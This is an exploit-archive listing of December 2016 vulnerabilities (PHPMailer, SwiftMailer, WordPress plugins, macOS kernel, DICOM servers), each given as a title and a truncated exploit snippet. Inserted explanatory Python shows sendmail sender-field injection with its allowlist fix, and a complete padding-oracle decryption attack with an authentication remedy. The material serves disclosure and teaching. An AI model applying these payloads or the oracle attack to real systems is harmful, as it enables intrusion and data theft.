SwiftMailer 5.4.5-DEV - Remote Code Execution
See the full advisory URL for the exploit details. // Attacker's input coming from untrusted source such as $_GET, $_POST etc. // For example from a Contact form with sender field $email_from = '"attacker" -oQ/tmp/...
WordPress Plugin Simply Poll 1.4.1 - SQL Injection
Exploit Title: Simply Poll 1.4.1 Plugin for WordPress SQL Injection Date: 21/12/2016 Exploit Author: TAD GROUP Vendor Homepage: https://wordpress.org/plugins/simply-poll/ Software Link: https://wordpress.org/plugins/simply-poll/ Contact:...
Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection
Exploit Title: SQLi Blind Time-based on Joomla + Virtuemart + aweb-cartwatching-system/aweb-cartwatching = 2.6.0 Date: 28-12-2016 Software Link: http://awebsupport.com/products/aweb-cartwatching-system Exploit Author...
PHPMailer 5.2.20 - Remote Code Execution
#!/usr/bin/python intro = """ PHPMailer RCE PoC Exploits PHPMailer " postfields = {'action':...
Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation
Vendor Homepage: http://www.wampserver.com/ Date: 10 Dec 2016 Version: Wampserver 3.0.6 32 bit x86 Tested on: Windows 7 Ultimate SP1 EN Author: Heliand Dema Contact:...
Joomla! Component Blog Calendar - SQL Injection
Joomla com_blogcalendar SQL Injection Vulnerability...
PHPMailer 5.2.18 - Remote Code Execution (Bash)
#!/bin/bash # CVE-2016-10033 exploit by opsxcq # https://github.com/opsxcq/exploit-CVE-2016-10033 echo '+ CVE-2016-10033 exploit by opsxcq' if [ -z "$1" ] then echo '- Please inform an host as parameter' exit -1 fi host=$1 echo '+ Exploiting '$host curl -sq...
FTPShell Server 6.36 - .csv Local Denial of Service
Exploit FTPShell server 6.36 '.csv' CrashPoC Author: albalawisultan Tested on: win7 st: http://www.ftpshell.com/download.htm 1-open FTPShell Server Administrator 2-manage Ftp accounts 3-import from csv ban=...
Shutter 0.93.1 - Code Execution
Exploit Title: Shutter user-assisted remote code execution Date: 2016-12-26 Software Link: http://shutter-project.org/ Version: 0.93.1 Tested on: Ubuntu, Debian Exploit Author: Prajith P Website: http://prajith.in/ Author Mail: [email protected] CVE: CVE-2016-10081 1...
PHPMailer 5.2.18 - Remote Code Execution (PHP)
"; // ------------------ // mail param injection via the vulnerability in PHPMailer require_once('class.phpmailer.php'); $mail = new PHPMailer; // defaults to using php "mail()" $mail->SetFrom($email_from, 'Client Name')...
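The SwiftMailer and both PHPMailer entries above share one root cause: the envelope sender is handed to /usr/sbin/sendmail through a shell command line, so a sender whose quoted local part contains spaces ("attacker" -oQ/tmp/...) is re-split by the shell into extra sendmail options. The block below is an added Python example, not code from any of the advisories. It shows what the shell actually makes of such a sender, extracts the smuggled options, and contrasts that with the hardened form (an allowlist on the sender plus an argv list with no shell). The sample addresses, the allowlist regex and the function names are constructed for this example; the injected sample reuses only the -oQ/tmp/ fragment visible in the listing.

```python
"""Sendmail argument injection through the sender field, and its hardened form.
Added example: not code from the PHPMailer or SwiftMailer advisories."""
import re
import shlex

# Constructed samples. A quoted local part may legally contain spaces (RFC 5322),
# which is why an address validator alone does not stop this.
NORMAL_SENDER = "alice@example.com"
INJECTED_SENDER = '"attacker" -oQ/tmp/ "some"@example.com'

# Allowlist in the spirit of the post-CVE-2016-10033 shell-safety check
# (assumption: a conservative restatement, not the library's own regex).
_SHELL_SAFE = re.compile(r"[A-Za-z0-9@._+-]+")


def shell_tokens(sender: str) -> list:
    """Argv sendmail receives when the mailer builds ONE shell string
    ('sendmail -t -i -f<sender>') and lets the shell split it (the pre-fix pattern)."""
    return shlex.split(f"/usr/sbin/sendmail -t -i -f{sender}")


def injected_options(sender: str) -> list:
    """Sendmail options smuggled in through the sender field (empty if none)."""
    return [t for t in shell_tokens(sender)[3:]
            if t.startswith("-") and not t.startswith("-f")]


def is_shell_safe(sender: str) -> bool:
    """True only if every character is in the allowlist; no quotes, spaces or dashes
    that could start a new option."""
    return _SHELL_SAFE.fullmatch(sender) is not None


def safe_argv(sender: str) -> list:
    """Hardened form: reject anything outside the allowlist, and pass argv as a
    list so the whole sender is exactly one argument whatever it contains."""
    if not is_shell_safe(sender):
        raise ValueError(f"sender rejected by shell-safety allowlist: {sender!r}")
    return ["/usr/sbin/sendmail", "-t", "-i", f"-f{sender}"]
```

Running `injected_options(INJECTED_SENDER)` yields `['-oQ/tmp/']`: the shell has turned one address into a separate sendmail option, which is the whole bug. The allowlist is deliberately stricter than RFC 5322; for a contact form that is the right trade-off, since the sender should usually go into Reply-To and the envelope sender should be a fixed local address anyway.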
XAMPP Control Panel - Denial Of Service
+ Credits: John Page (hyp3rlinx) + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt + ISR: ApparitionSec Vendor: www.apachefriends.org Product:...
Sonicwall 8.1.0.2-14sv - extensionsettings.cgi Remote Command Injection (Metasploit)
Exploit Title: Sonicwall extensionsettings scriptname Remote Command Injection Vulnerability Date: 12/25/2016 Exploit Author: xort @ Critical Start Vendor Homepage: www.sonicwall.com Software Link:...
Sonicwall 8.1.0.2-14sv - viewcert.cgi Remote Command Injection (Metasploit)
Exploit Title: Sonicwall viewcert.cgi CGI Remote Command Injection Vulnerability Date: 12/24/2016 Exploit Author: xort @ Critical Start Vendor Homepage: www.sonicwall.com Software Link:...
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010 This issue affects OpenSSH if privilege separation is disabled (config option UsePrivilegeSeparation=no). While privilege separatio...
OpenSSH 7.4 - agent Protocol Arbitrary Library Loading
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009 The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled...
Apache mod_session_crypto - Padding Oracle
Advisory: Padding Oracle in Apache mod_session_crypto During a penetration test, RedTeam Pentesting discovered a Padding Oracle vulnerability in mod_session_crypto of the Apache web server. This vulnerability can be exploited to decrypt the session data an...
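What "exploited to decrypt the session data" means mechanically for a padding oracle, as an added example that is not RedTeam Pentesting's code and does not model mod_session_crypto's real cipher, key derivation or cookie format. The server side here uses a toy 4-round HMAC-SHA256 Feistel cipher in CBC mode with PKCS#7 padding, purely so the script runs offline on the standard library; the attack function only ever calls the one-bit "padding valid / invalid" oracle, which is the same interface any CBC implementation with a distinguishable padding error exposes. Key, IV, session string and all names are constructed for this example.

```python
"""CBC padding-oracle decryption against a local oracle (added example)."""
import hashlib
import hmac

BLOCK = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Toy stand-in for AES: 4-round Feistel on 16-byte blocks, keyed through HMAC.
def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def _enc_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return r + l


def _dec_block(key: bytes, block: bytes) -> bytes:
    r, l = block[:8], block[8:]
    for i in reversed(range(4)):
        r, l = l, _xor(r, _f(key, i, l))
    return l + r


def _unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinguishable error IS the oracle
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    n = BLOCK - len(pt) % BLOCK
    pt += bytes([n]) * n
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = _enc_block(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(_dec_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return _unpad(out)


class SessionServer:
    """The vulnerable side: reveals whether a submitted session blob had valid padding."""

    def __init__(self, key: bytes):
        self._key = key

    def padding_ok(self, iv: bytes, ct: bytes) -> bool:
        try:
            cbc_decrypt(self._key, iv, ct)
            return True
        except ValueError:
            return False


def padding_oracle_decrypt(oracle, iv: bytes, ct: bytes) -> bytes:
    """Recover the plaintext using only oracle(prev_block, block) -> bool; no key needed."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D(target), learned right to left
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            # Bytes after pos are already known: force them to decrypt to `pad`.
            forged = bytearray(_xor(bytes(inter), bytes([pad]) * BLOCK))
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), target):
                    continue
                if pos == BLOCK - 1:  # rule out an accidental 0x02 0x02 (etc.) match
                    probe = bytearray(forged)
                    probe[pos - 1] ^= 0xFF
                    if not oracle(bytes(probe), target):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("no padding-valid guess; not a CBC/PKCS#7 oracle?")
        plain += _xor(bytes(inter), prev)
    return _unpad(plain)


def demo() -> bytes:
    key = bytes(range(16))  # constructed server key; the attacker never sees it
    iv = bytes(16)  # constructed IV, sent with the ciphertext as a cookie would be
    session = b"user=alice;role=staff;id=42"  # constructed session data
    server = SessionServer(key)
    ct = cbc_encrypt(key, iv, session)
    return padding_oracle_decrypt(server.padding_ok, iv, ct)
```

`demo()` returns the session string with at most 256 oracle queries per byte, and the same loop with the forged previous block also lets an attacker forge chosen plaintext (CBC bit-flipping once the intermediate values are known). The fix that removes the oracle is to authenticate the ciphertext (an HMAC checked before decryption, or an AEAD mode) so that any tampered blob fails identically before padding is ever inspected.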
Freepbx 2.11.1.5 - Remote Code Execution
Exploit Title: Freepbx cookie recordings injection Google Dork: Ask Santa Date: 23/12/2016 Exploit Author: inj3ctor3 Vendor Homepage: https://www.freepbx.org/ Software Link: ISO LINKS IN SITE https://www.freepbx.org/ Version: ALL && unpatched/...
Vesta Control Panel 0.9.8-16 - Local Privilege Escalation
#!/bin/bash # Exploit Title: Vesta Control Panel 0.9.7 suid.c PWN # Make PWN shell script executable. chmod...
Apple macOS 10.12.2 iOS 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=926 mach ports are really struct ipc_port_t's in the kernel; this is a reference-counted object, ip_reference...
Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=974 There are two ways for IOServices to define their IOUserClient classes: they can override IOService::newUserClient and allocate the...
Apple macOS 10.12.2 iOS 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=959 Proofs of Concept:...
Apple macOS 10.12.1 iOS 10.2 - syslogd Arbitrary Port Replacement
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=977 syslogd running as root hosts the com.apple.system.logger mach service. It's part of the system.sb sandbox profile and so reachable from a lot of sandboxed...
Apple macOS 10.12.1 iOS 10.2 - powerd Arbitrary Port Replacement
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=976 powerd running as root hosts the com.apple.PowerManagement.control mach service. It checks in with launchd to get a server port and then wraps that in a CFPort:...
Microsoft Internet Explorer 11 - MSHTML CPasteCommand::ConvertBitmaptoPng Heap Buffer Overflow (MS14-056)
Security Settings - Choose a zone - Scripting should prevent websites from programmatically copy/pasting an image. Disabling execution of scripts on web-pages altogether will have the same...
Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954 Proofs of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40954.zip Userspace MIG services often use...
IBM AIX 6.1/7.1/7.2 - Bellmail Local Privilege Escalation
#!/usr/bin/sh # CVE-2016-8972/bellmail_root.sh: IBM AIX Bellmail local root # Affected versions: AIX 6.1, 7.1, 7.2 VIOS 2.2.x Fileset Lower Level Upper Level KEY bos.net.tcp.client 6.1.9.0...
Apple macOS 10.12.2 iOS 10.2 - _kernelrpc_mach_port_insert_right_trap Kernel Reference Count Leak Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=941 Proofs of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40956.zip The...
Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)
try { var v = SIMD.Int32x4(1, 2, 3, 4); alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7)); } catch (e) { alert(e.message); }...
Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)
1; }, set: function() {} }; function f() { var i = Intl; Intl = {}; // this somehow prevents an exception that prevents loading d(i, "Collator", noobj); Objec...
NETGEAR WNR2000v5 - Remote Code Execution
Remote code execution in NETGEAR WNR2000v5 - by Pedro Ribeiro ([email protected]) / Agile Information Security Released on 20/12/2016 NOTE: this exploit is "alpha" quality and has been deprecated. Please see the modules accepted into the Metasploit framework...
Google Android - WifiNative::setHotlist Stack Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=958 The following code in frameworks/opt/net/wifi/service/jni/com_android_server_wifi_WifiNative.cpp doesn't validate the parameter params.num_bssid, and then copies that number of...
Microsoft Internet Explorer 11 - MSHTML CSpliceTreeEngine::RemoveSplice Use-After-Free (MS14-035)
document.addEventListener("DOMNodeRemoved", function() { document.open(); // free // attempt to modify freed memory here // because it will be...
Java Debug Wire Protocol (JDWP) - Remote Code Execution
#!/usr/bin/python # Universal JDWP shellifier # @hugsy # And special cheers to @lanjelot import socket import time import sys import struct import urllib import argparse # JDWP protocol variables HANDSHAKE = "JDWP-Handshake" REQUEST_PACKET_TYPE = 0x00...
WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection
Exploit Title: Unauthenticated SQL injection in 404 plugin for Wordpress v1.0 Google Dork: N/A Date: 17/12/2016 Exploit Author: Ahmed Sherif (Deloitte) Vendor Homepage: N/A Software Link:...
Google Chrome 31.0.1650.48 - HTTP 1xx base::StringTokenizerT...::QuickGetNext Out-of-Bounds Read
Source: http://blog.skylined.nl/20161219001.html Synopsis: A specially crafted HTTP response can allow a malicious web-page to trigger an out-of-bounds read vulnerability in Google Chrome. The...
Naenara Browser 3.5 (RedStar 3.0 Desktop) - JACKRABBIT Client-Side Command Execution
n0m3rcYn0M3rCyn0m3Rc N0MeRCYn0m3rCyn0m3rCyn0m n0MERCypDK var xunescape = unescape; oneblock = xunescape("%u0040%u1000"); stackpivot =...
RedStar 3.0 Server - Shellshock BEAM RSSMON Command Injection
#!/usr/bin/env python # RedStar OS 3.0 Server BEAM & RSSMON shellshock exploit # BEAM & RSSMON are Webmin based configuration utilities that ship with RSS server 3.0. These packages a...
ConQuest DICOM Server 1.4.17d - Stack Buffer Overflow (PoC)
#!/usr/bin/env python # -*- coding: utf8 -*- # ConQuest DICOM Server 1.4.17d Remote Stack Buffer Overflow RCE Vendor: University of Manchester. Developed by Marcel van Herk, Lambert Zijp and Jan Meinders. The Netherlands Cancer Institute Product web page:...
Microsoft Internet Explorer 9 - IEFRAME CMarkupPointer::MoveToGap Use-After-Free
Source: http://blog.skylined.nl/20161215001.html Synopsis: A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. The use appears to happen only once almost...
Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service
#!/usr/bin/env python # -*- coding: utf8 -*- # Horos 2.1.0 DICOM Medical Image Viewer Remote Memory Overflow Vulnerability Vendor: Horos Project Product web page: https://www.horosproject.org Affected version: 2.1.0 Summary: Horos™ is an...
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)
Exploit Title: WP Private Messages 1.0.1 – Plugin WordPress – SQL Injection Exploit Author: Lenon Leite Vendor Homepage: https://wordpress.org/plugins/wp-private-messages/ Software Link: https://wordpress.org/plugins/wp-private-messages...
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 – WordPress Plugin – SQL Injection Exploit Author: Lenon Leite Vendor Homepage: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/...
Microsoft Internet Explorer 9 - IEFRAME CView::EnsureSize Use-After-Free (MS13-021)
var oElement = document.getElementById("ruby"); var oElement = oElement.parentNode.removeChild(oElement); document.write(""); document.documentElement.offsetTop; setTimeout("location.reload()", 100); <!-- Time-lin...
OsiriX DICOM Viewer 8.0.1 - Memory Corruption
#!/usr/bin/env python # -*- coding: utf8 -*- # OsiriX DICOM Viewer 8.0.1 dulparse.cc Remote Memory Corruption Vulnerability Vendor: Pixmeo Sarl Product web page: http://www.osirix-viewer.com Affected version: OsiriX 8.0.1 Summary: With high performance and a...
Apple macOS 10.12 16A323 XNU Kernel iOS 10.1.1 - set_dp_control_port Lack of Locking Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=965 set_dp_control_port is a MIG method on the host_priv_port so this bug is a root->kernel escalation. kern_return_t set_dp_control_port(host_pri...
WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection
Exploit Title: VMPanel 2.7.4 - SQL Injection Web Vulnerability Author: Esmaeil Rahimian Date Discovered: 2016-12-07 Affected Products: VMPanel v2.7.4 - Content Management System...
Horos 2.1.0 Web Portal - Directory Traversal
Horos 2.1.0 Web Portal Remote Information Disclosure Exploit Vendor: Horos Project Product web page: https://www.horosproject.org Affected version: 2.1.0 Summary: Horos™ is an open-source, free medical image viewer. The goal of the Horos Project is to...
WordPress Plugin Quiz And Survey Master 4.5.44.7.8 - Cross-Site Request Forgery
alert(1)” in the question_name field then “question: ‘alert(1)’,” will get output inside the JS object. All good so far. However, in js/admin_question.js on line 205, we see this line, as part of some JS-generated HTML:...
Orthanc DICOM Server 1.1.0 - Memory Corruption
#!/usr/bin/env python # -*- coding: utf8 -*- # Orthanc DICOM Server 1.1.0 Remote Memory Corruption Vulnerability Vendor: Sébastien Jodogne Product web page: http://www.orthanc-server.com Affected version: 1.1.0 Summary: Orthanc is a Belgian, open-source,...